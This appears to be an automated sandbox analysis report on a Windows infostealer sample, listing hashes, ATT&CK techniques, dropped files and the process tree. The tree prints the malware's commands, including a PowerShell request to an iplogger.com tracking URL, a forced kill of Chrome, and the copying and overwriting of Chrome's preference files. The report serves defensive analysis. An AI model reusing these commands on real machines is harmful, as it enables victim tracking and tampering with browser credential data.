29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c

Analysis

max time kernel
106s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14-04-2023 10:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe
Size

483KB
MD5

42a3a01785ac6597bc4b843340065dca
SHA1

a39903c489ab139da0a17ee74f64288424420c89
SHA256

29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c
SHA512

729118e5be5b4d2d5b476bf551cef695cf109a703697c1b4d3fbe6a498b7ac51eaf246859e8b253998b33f9b22d5f8ede6cdd6bc03eb0b669d02b8dd8db37e28
SSDEEP

6144:PtZlz6dpdLXUJkn6NS/H34jUrJ5yrIkzGbnuMKcAXDguOZ4KZGMI9P3v/i:Vz6dpdoy6NS/ojoAOuMPAzMGMIp//i

Score

8^/10

spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	4004	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1964	Settings.exe
320	tmpF82D.tmp.exe

Loads dropped DLL 1 IoCs

pid	Process
1792	29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4904	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4004	powershell.exe
4004	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	320	tmpF82D.tmp.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	4904	taskkill.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 3008	1792	29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe	88
PID 1792 wrote to memory of 3008	1792	29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe	88
PID 1792 wrote to memory of 3008	1792	29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe	88
PID 3008 wrote to memory of 1964	3008	cmd.exe	90
PID 3008 wrote to memory of 1964	3008	cmd.exe	90
PID 3008 wrote to memory of 320	3008	cmd.exe	92
PID 3008 wrote to memory of 320	3008	cmd.exe	92
PID 3008 wrote to memory of 4004	3008	cmd.exe	93
PID 3008 wrote to memory of 4004	3008	cmd.exe	93
PID 3008 wrote to memory of 4004	3008	cmd.exe	93
PID 1932 wrote to memory of 4904	1932	CMD.EXE	100
PID 1932 wrote to memory of 4904	1932	CMD.EXE	100
PID 4580 wrote to memory of 4664	4580	CMD.EXE	99
PID 4580 wrote to memory of 4664	4580	CMD.EXE	99
PID 2512 wrote to memory of 1740	2512	CMD.EXE	105
PID 2512 wrote to memory of 1740	2512	CMD.EXE	105
PID 740 wrote to memory of 852	740	CMD.EXE	108
PID 740 wrote to memory of 852	740	CMD.EXE	108
PID 4496 wrote to memory of 4464	4496	CMD.EXE	111
PID 4496 wrote to memory of 4464	4496	CMD.EXE	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe
"C:\Users\Admin\AppData\Local\Temp\29e61384c93096cafee84d5bcff5b4bd354bbfcfefe20e5ad03b53c9aee1a70c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c start "" "Settings.exe" & start "" "tmpF82D.tmp.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Users\Admin\AppData\Local\Temp\Settings.exe
    "Settings.exe"
    3⤵
    - Executes dropped EXE
    PID:1964
- - C:\Users\Admin\AppData\Local\Temp\tmpF82D.tmp.exe
    "tmpF82D.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:320
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4004

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c taskkill /im chrome.exe /f
1⤵
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\system32\taskkill.exe
  taskkill /im chrome.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4904

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences" > "C:\Users\Admin\AppData\Local\Temp\__data" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Windows\system32\more.com
  more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences"
  2⤵
  PID:4664

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences" > "C:\Users\Admin\AppData\Local\Temp\__data" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\system32\more.com
  more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences"
  2⤵
  PID:1740

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences" > "C:\Users\Admin\AppData\Local\Temp\__data" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
- Suspicious use of WriteProcessMemory
PID:740
- C:\Windows\system32\more.com
  more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences"
  2⤵
  PID:852

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Temp\__data" > "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
- Suspicious use of WriteProcessMemory
PID:4496
- C:\Windows\system32\more.com
  more "C:\Users\Admin\AppData\Local\Temp\__data"
  2⤵
  PID:4464

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Settings.exe

Filesize
558KB

MD5
61bb691f0c875d3d82521a6fa878e402

SHA1
e987b42ef3f2ae177e34fc77734f20a54298cae6

SHA256
6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

SHA512
2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Settings.exe

Filesize
558KB

MD5
61bb691f0c875d3d82521a6fa878e402

SHA1
e987b42ef3f2ae177e34fc77734f20a54298cae6

SHA256
6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

SHA512
2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lf3mtrtz.0b3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data

Filesize
10KB

MD5
a6e5a4b752abd21604226a1d5368f7cb

SHA1
992228f8cd68849c1535bd6be5e857f68a56f241

SHA256
79d40489be4966ed4d478101c01b428876d1a7cc50d06592e836bf314aa77e4a

SHA512
643876b75c52a3eeeeeab2ca14e2c68b043af52c21977b0cef0801647c3e2b57a6201a7eccc16da215a21ce1ecab74b4485a14dc97a2d90af1d9d1818cdbc709

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data

Filesize
7KB

MD5
3a790aaeea2140e23025122ad5567aa5

SHA1
5e5ad5045f711ac1cb58e7a95b6133cf4785ea80

SHA256
a3cfec08ec6cc617066c65bb25e56ba927285e3a2a2feacd4df5b1db73725caa

SHA512
833afbcfde26b2205e144127a70132b88d2e52fee5f450abcfb2f94eaa351ddae71be8513b9019e795b680f0db9c3caabc26ced0f68b2cd19101f4bb0672b4ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data

Filesize
10KB

MD5
a6e5a4b752abd21604226a1d5368f7cb

SHA1
992228f8cd68849c1535bd6be5e857f68a56f241

SHA256
79d40489be4966ed4d478101c01b428876d1a7cc50d06592e836bf314aa77e4a

SHA512
643876b75c52a3eeeeeab2ca14e2c68b043af52c21977b0cef0801647c3e2b57a6201a7eccc16da215a21ce1ecab74b4485a14dc97a2d90af1d9d1818cdbc709

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data

Filesize
11KB

MD5
af9d66874b95e8a2ecf62e7930a75b1b

SHA1
9bcecf6b79138c1154d806da5ee8bfa03d917f0c

SHA256
0c04114cde715605aa4b53daabf3f1423f422d02ee27ac361ac9e06a9ef24e47

SHA512
017ac7c3135ad65e646c766dbc994c44fd10311943e957401a69999028d20b3906c6f172e650da3aa43fcaeaa299225c5c2a03b7236646add5b22351c8025ba5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data1

Filesize
4B

MD5
0d076ba36266d85eb56cad903daa6b88

SHA1
eff33c54516bca3d426493bc7ef4b87c3f2e8601

SHA256
9aca8dfce962538fb8131d73f84cada05e4dc79f5a0d3612c511b1150f3e33e2

SHA512
53e86d2855340a1f89b5ce1b733ae928ff33101a29568f3c2e24bfb843288d1b8ee2f713a38afcae5fcc88d114afcbd04277f0d2a3e013dd9e106e2b3946b07f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data1

Filesize
4B

MD5
0d076ba36266d85eb56cad903daa6b88

SHA1
eff33c54516bca3d426493bc7ef4b87c3f2e8601

SHA256
9aca8dfce962538fb8131d73f84cada05e4dc79f5a0d3612c511b1150f3e33e2

SHA512
53e86d2855340a1f89b5ce1b733ae928ff33101a29568f3c2e24bfb843288d1b8ee2f713a38afcae5fcc88d114afcbd04277f0d2a3e013dd9e106e2b3946b07f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data1

Filesize
4B

MD5
0d076ba36266d85eb56cad903daa6b88

SHA1
eff33c54516bca3d426493bc7ef4b87c3f2e8601

SHA256
9aca8dfce962538fb8131d73f84cada05e4dc79f5a0d3612c511b1150f3e33e2

SHA512
53e86d2855340a1f89b5ce1b733ae928ff33101a29568f3c2e24bfb843288d1b8ee2f713a38afcae5fcc88d114afcbd04277f0d2a3e013dd9e106e2b3946b07f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__data1

Filesize
4B

MD5
0d076ba36266d85eb56cad903daa6b88

SHA1
eff33c54516bca3d426493bc7ef4b87c3f2e8601

SHA256
9aca8dfce962538fb8131d73f84cada05e4dc79f5a0d3612c511b1150f3e33e2

SHA512
53e86d2855340a1f89b5ce1b733ae928ff33101a29568f3c2e24bfb843288d1b8ee2f713a38afcae5fcc88d114afcbd04277f0d2a3e013dd9e106e2b3946b07f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgBDE7.tmp\03S5FV2.dll

Filesize
6KB

MD5
293165db1e46070410b4209519e67494

SHA1
777b96a4f74b6c34d43a4e7c7e656757d1c97f01

SHA256
49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

SHA512
97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF82D.tmp.exe

Filesize
37KB

MD5
4f0402bf30445ece92c85cd3ee8240ac

SHA1
26d327332540b1bbe091db0f7e2345a1295ae271

SHA256
94f79307cf406166058b66af4ef21d3eb58051b1d1dd0ec793e5406fc59fb7e8

SHA512
a43cee4c53bc87d1507455b00350b5fcf0ccf64bf0a615b1215e163cd0899eace9906f80d61583ef65fa38669bbf93f5af71948080abe8047cab5950d5914396

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF82D.tmp.exe

Filesize
37KB

MD5
4f0402bf30445ece92c85cd3ee8240ac

SHA1
26d327332540b1bbe091db0f7e2345a1295ae271

SHA256
94f79307cf406166058b66af4ef21d3eb58051b1d1dd0ec793e5406fc59fb7e8

SHA512
a43cee4c53bc87d1507455b00350b5fcf0ccf64bf0a615b1215e163cd0899eace9906f80d61583ef65fa38669bbf93f5af71948080abe8047cab5950d5914396

Download Submit
memory/320-147-0x0000024A42DD0000-0x0000024A42E20000-memory.dmp

Filesize
320KB

Download
memory/320-149-0x0000024A42EA0000-0x0000024A42EB0000-memory.dmp

Filesize
64KB

Download
memory/320-194-0x0000024A42EA0000-0x0000024A42EB0000-memory.dmp

Filesize
64KB

Download
memory/320-144-0x0000024A27C30000-0x0000024A27C40000-memory.dmp

Filesize
64KB

Download
memory/4004-166-0x00000000073D0000-0x0000000007A4A000-memory.dmp

Filesize
6.5MB

Download
memory/4004-167-0x0000000006060000-0x000000000607A000-memory.dmp

Filesize
104KB

Download
memory/4004-153-0x0000000004C40000-0x0000000004CA6000-memory.dmp

Filesize
408KB

Download
memory/4004-152-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

Filesize
136KB

Download
memory/4004-151-0x0000000002730000-0x0000000002740000-memory.dmp

Filesize
64KB

Download
memory/4004-150-0x0000000002730000-0x0000000002740000-memory.dmp

Filesize
64KB

Download
memory/4004-154-0x0000000004CB0000-0x0000000004D16000-memory.dmp

Filesize
408KB

Download
memory/4004-148-0x0000000004DD0000-0x00000000053F8000-memory.dmp

Filesize
6.2MB

Download
memory/4004-146-0x00000000025B0000-0x00000000025E6000-memory.dmp

Filesize
216KB

Download
memory/4004-165-0x0000000002730000-0x0000000002740000-memory.dmp

Filesize
64KB

Download
memory/4004-164-0x0000000005B70000-0x0000000005B8E000-memory.dmp

Filesize
120KB

Download